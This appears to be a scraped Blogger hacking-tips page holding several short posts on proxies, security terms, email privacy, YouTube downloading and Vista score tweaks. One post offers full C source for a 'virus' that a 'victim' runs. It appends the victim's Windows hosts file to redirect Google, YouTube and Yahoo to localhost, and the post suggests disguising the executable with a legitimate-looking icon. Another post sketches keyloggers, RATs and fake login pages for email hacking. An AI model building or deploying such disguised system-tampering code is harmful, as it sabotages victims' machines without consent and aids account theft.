This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Proxy Servers and Anonymizers


Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 




  • As firewall, a proxy protects the local network from outside access.

  • As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.

  • Proxy servers can be used (to some extent) to anonymize web surfing.

  • Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.

  • Proxy servers can afford some protection against hacking attacks.


Anonymizers



  • Anonymizers are services that help make your own web surfing anonymous.

  • The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

  • An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

Creating a Virus to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.


This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.


NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?


Here is the sourcecode of the virus.


#include<stdio.h>

#include<dos.h>

#include<dir.h>


char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;


int find_root(void);

void block_site(void);


int find_root()

{

int done;

struct ffblk ffblk;//File block structure


done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}


done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}


done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}


done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}


else return 0;

}


void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/


fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}


void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}


How to Compile ?


1. Download the source code here. Download the compiled module(virus) here.


2. Compile the sourcecode using any C/C++ compiler.


3. To test, run the compiled module. It will block the sites that is listed in the source code.


4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.


4. To remove the virus type the following the Run.

%windir%\system32\drivers\etc


5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this


127.0.0.1—————————google.com


6. Delete all such entries which contain the names of blocked sites.


NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post:How to Change the ICON of an EXE file ?

Common Terminologies used in Internet Security


If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.


Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.


Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.


IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.


Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.


Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.


Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.


Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

Tips to improve Email Privacy


Many websites ask for your email address when you shop online, download a free software etc. But do you know that this has a chance of affecting your email privacy through Spam emails?


Though most websites don’t use spamming as an email marketing strategy, there are a few that use junk emails that don’t care about anti-Spam laws. Here are some tips to maintain your email privacy from such threats.

Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to loose their hard earned reputation by getting blammed for spamming.


See whether the websites provides email privacy statements. You need to go through these statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide on whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.


Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is just a good indication that the website doesn’t respect your privacy. So watch out!

Common Email Hacking methods


Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.


Hackers can install key logger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details. Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).


Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.


Before leaving you should definitely consider reading my latest post Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking.

How to Download Videos from Youtube


Here is the most easiest way to download videos from Youtube and convert it into other formats.Most of the sites give you some confusing way to download videos from Youtube, but here is an easy way.Here is step-by-step guide to download videos from Youtube.


STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBE


Basically the video that you want to download from Youtube will be in the .flv format.So first, when you download videos from Youtube, it will be saved in .flv format. 


Once you get the video URL,  you can use any one of the following sites/plugins to download Youtube videos .



  • Download Youtube Videos - Download Youtube Videos is one of the most widely site to download videos from Youtube in the .flv format.Here you’ll see a box to enter the download URL.Just enter the URL here and click on download to save the video.

  • KissYouTube - KissYouTube offers an easiest way to download videos from Youtube.Just visit the site and you’ll find a box to enter the video URL.In this box enter the URL of the video you want to download and click on GO.Next you will see a Download Button.Click on the download button and save the Youtube video with the extension as .flv .

  •  Download Helper - Download Helper is an excellent firefox plugin to download videos from Youtube.

  • My Video Downloader - MyVideo Downloader will Download and convert videos from many sites, not just YouTube.


 


STEP-2. CONVERTING THE YOUTUBE VIDEO FROM .FLV TO OTHER FORMATS


Once you download the video ,you can use any of the freely available/commercial video conversion softwares.But here in this tutorial I prefer OJOsoft Total Video Converter to convert the downloaded Youtube video.The speciality of this video converter is that it supports almost all the formats.Once you convert the Youtube downloaded video to MPEG format you’ll be able to play it with Windows Media Player.

Hack/Alter Windows Vista Base Score

If you are a Windows Vista user then you are very likely to be familiar with the Base Score.This score is calculated based on the computer’s hardware and software configuration.This score act’s as a rating to your PC.If you have a too low base score then don’t worry.Hacking Windows Vista’s so called Base Score is very easy.It is possible to hack this score within no time.Here are the snapshots of my own system.Actually my system’s base score is 3.7.But I have brought it up to 9.5 with this small hack.Can you beleive this!!




Here is a step-by-step instruction to hack Vista Base score


1. Navigate to C:\Windows\Performance\WinSAT\DataStore


2. You should see a .xml file with Assessment (Formal).WinSAT as filename


3. Right-click it and select open with ‘Wordpad’ (Not notepad!)


4. On line 12, you should see something like the following:

<SystemScore>9.5</SystemScore>

<MemoryScore>9.5</MemoryScore>

<CpuScore>9.5</CpuScore>

<CPUSubAggScore>9.5</CPUSubAggScore>

<VideoEncodeScore>5.5</VideoEncodeScore>

<GraphicsScore>9.5</GraphicsScore>

<GamingScore>9.5</GamingScore>

<DiskScore>9.5</DiskScore>


5. You can enter any number in the place where I have written 9.5.But the number should be less than 10.


6. Once you have entered the number of your choice save the file and close it.


7. That’s it.You have successfully altered your Windows Vista base score.No restart is required.